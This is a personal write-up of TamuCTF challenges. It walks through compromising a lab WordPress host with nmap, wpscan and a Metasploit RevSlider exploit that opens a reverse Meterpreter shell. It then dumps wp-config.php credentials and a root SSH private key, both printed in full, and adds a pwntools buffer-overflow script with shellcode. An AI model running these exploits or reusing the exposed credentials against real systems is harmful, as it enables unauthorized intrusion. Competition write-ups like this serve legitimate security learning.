TamuCTF writeup
TamuCTF was a 9 days long CTF, and many challenges are practical that we can use it in the real world. This is the fifth time I participate in the CTF, and personally I think that's easier than usual. I still need to learn more basic knowledges as I almost didn't get points in Android, Network, ReadingRainbow, and Web fields. As each Honeypot challenge has extraordinary big file, I couldn't download it! Eventually, I was 322nd out of 1896 teams. Anyway, I need to practice more web, reversing, pwn, and networking challenges.
This Post includes the writeup to the following Challenges.
Network
Wordpress
We find two hosts with nmap.
Then we open the host 172.30.0.3 with port 80.
curl -v 172.30.0.3
The server hosts a wordpress site. The hint in the title says the flag is in the path: /root/flag.txt, so we consider a way to access into host 172.30.0.3 and get it. Then we run wpscan to detect vulnerable components.
wpscan --url 172.30.0.3
We find two vulnerabilities. The first one is a file read vulnerability:
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579
The second one is a file upload vulnerability.
WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload
Unfortunately, we can just use root privilege to read files, so we focus on the second vulnerability.
In this case, we can use metasploit.
$msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.17.3-dev ]
-- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
-- --=[ 538 payloads - 41 encoders - 10 nops ]
-- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search revslider
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent WordPress RevSlider File Upload and Execute Vulnerability
msf > use exploit/unix/webapp/wp_revslider_upload_execute
msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST 172.30.0.3
RHOST => 172.30.0.3
msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit
[*] Started reverse TCP handler on 172.30.0.14:4444
[+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.30.0.3
[*] Meterpreter session 1 opened (172.30.0.14:4444 -> 172.30.0.3:32924) at 2019-03-05 04:29:29 -0500
[+] Deleted xyXWLY.php
[+] Deleted ../revslider.zip
meterpreter > pwd
/var/www/wp-content/plugins/revslider/temp/update_extract/revslider
meterpreter > shell
Process 78 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
<t/plugins/revslider/temp/update_extract/revslider$ pwd
pwd
/var/www/wp-content/plugins/revslider/temp/update_extract/revslider
<t/plugins/revslider/temp/update_extract/revslider$ cd /var/www
cd /var/www
www-data@apacheword:/var/www$ ls
ls
index.php wp-admin wp-cron.php wp-mail.php
license.txt wp-blog-header.php wp-includes wp-settings.php
note.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
www-data@apacheword:/var/www$ cat note.txt
cat note.txt
Your ssh key was placed in /backup/id_rsa on the DB server.
As I mentioned, we can't open the flag file because the flag.txt only can be read by root. Here we got an important information. We can consider to log in as root by ssh if we can find private key on the DB server || path:/backup/id_rsa Some significant information may be hiden inside of configuration file: wp-config.php So, we confirm wp-config.php
cat wp-config.php cat wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', '0NYa6PBH52y86C');
/** MySQL hostname */
define('DB_HOST', '172.30.0.2');
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...
We got the DB password.
Connect to DB:
mysql -u wordpress -h 172.30.0.2 -p wordpress Enter password:
MySQL [wordpress]> select load_file('/backup/id_rsa');
Then we get RSA private key.
| -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA3Z35DpTcnm4kFkkGp6iDXqvUNH+/+hSDOY6rXsa40WMr7rjc tHh8TgOBFZ6Rj5VzU/jY8O0qHxiPVn7BCYKhqyp1V1l9/ZCPRSjRLYy62dVTiHUt ZbiPiY9+biHIsQ/nZfwiHmwlb0sWDoyFvX3OL/3AFMcYpZ4ldHQuwszJF4DeTV33 ruSBoXIiICQyNJBHTboVel+WXAfMNumYMVNrtrwpNoD7whv9Oa2afUejXMJL42Rw 8Xhab59HIIL9fl68FqgggVI4X3d/fzqKKGyoN5JxBLmQTCiVxhxTMv9OS0MhdSg6 Nh3+lf/wUuweUQXqmohvETntwwGs8jnJGCyeDwIDAQABAoIBAHGVRpG/n/cfMiWt 1dhWGMaLwJ4Ln6QXoU39nj1cEltWvayDWLKyUdtWFnGzLJ1vloVCNEX+96iqWMSX AG7UYfGtOCjFuDoePh/PFK6IwzdkC4UTsWnCFucFAWKGtCpzoUB24jG/ccxBqpNY WC9PbD7SigDcLfisPjwaU+EJPkNpl93VBk1BCJRbvWF+Wl/si3wmMZ0YRoyIAF5L oBsq935xH8kJcixSVYKjG3hMUZfiLoQB+p/IFsxDlfGLE+M1esTZ5GIRjj+t7vBN l2JZTY893gjfQzUv2WrJXzMhJvWGzOCsRRc4gOSeS6GYiip8glqg8iWHpWdgF6i9 oAQx5pkCgYEA7oTmvy0cXvhPjkEbrizCCqf6sXfZps5e6eminTTBGA8NW/Uq+SQv 5JEYxvIL+qMH6cKkc8rBaNhgy3vnv+UgE1PUFI0UWFGKb+OpzzvY/zkmf03enxrl SK+QXH4FS9f7leivZRVEWBq1kDVIqHZtybYGg0etOvHYX0GwqV2UTy0CgYEA7dv0 bxz6CO9bhxxpXRrrykX2Z57J3JW2I3yVkCY+4Y6x106K11X+b1547kEZk40i2Ugc iE6jcYIRiYNiSgb0Ph4uxZHFlvBr8JA2fGHYIAnGRcoc1Gzgz5omRvU9H8uy5ipO LyZ2dnMgXRVOjuXoN4UZR2rgWmJVLD1q7eKnh6sCgYAnVOUUC2VNR9celx/wZdMN nMubLi9G8Wr3WZ6GG+fnhrvmORSABvaa005pqApPp0irxHwH2BxypJO5mlIJ88eJ SF6FkQoU0kVo0/rxgGX1GEB/56BZTj8W8FR23BUVf6UuADPEEHC3spfUEuVLWlQa WhjS1yP6v1y1wIhYNWU6dQKBgQDbZ1zdcXkh7MgcpRR7kW2WM1rK0imZk29i5HSB dwXhwWJCHGztnKEJ0bby7pHNDQ7sJhxLj14sQbIzikGLz0ZUVjsGeyQryrGGQUBB E2/sfZeqoHhfad8lICfWpDgxsA/hR3y++VekgyWDNzgzj9bX/6oFuowgUzwFhtGv hLbL6QKBgQCvcDMmWs2zXwmIo1+pIHUUSv2z3MWb0o1dzHQI/+FJEtyQPwL1nCwg bJaC0KT45kw0IGVB2jhWf0KcMF37bpMpYJzdsktSAmHdjLKdcr6vw2MNpRapaNQe On0QmLzbpFr9kjqorinKVkjk/WlTo9rKDSrLiUueEVYTxEMCi92giw== -----END RSA PRIVATE KEY-----
We can use this private key to log in as the root.
nano pkey.key
Copy&Paste the RSA private key to a key file. (We create a file named pkey.key)
Generate a public key:
ssh-keygen -p -f pkey.key
Enter new passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved with the new passphrase.
root@fang:~# ssh-keygen -y -f pkey.key > pkey.pub
Enter passphrase:
Use the private key to perform SSH authentication as root:
Enter passphrase for pkey.key:
Identity added: pkey.key (pkey.key)
root@fang:~# ssh root@172.30.0.3
X11 forwarding request failed on channel 0
Welcome to Ubuntu 14.04 LTS (GNU/Linux 4.4.0-141-generic x86_64)
* Documentation: https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@apacheword:~# ls
flag.txt
root@apacheword:~# cat flag.txt
gigem{w0rd_pr3ss_b3st_pr3ss_409186FC8E2A45FE}
Access granted.
PWN
pwn3
Python code:
from pwn import *
p = remote("pwn.tamuctf.com", 4323)
k = p.recvline()
print k
k = k.split(" ")[9]
k=(k[:10])
bufferLocation = p32(int(k,16))
shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
payload = ""
payload += shellcode
payload += "\x90"*(298-len(shellcode))
payload += "A"*4
payload += bufferLocation
p.sendline(payload)
p.sendline("cat flag.txt")
p.interactive()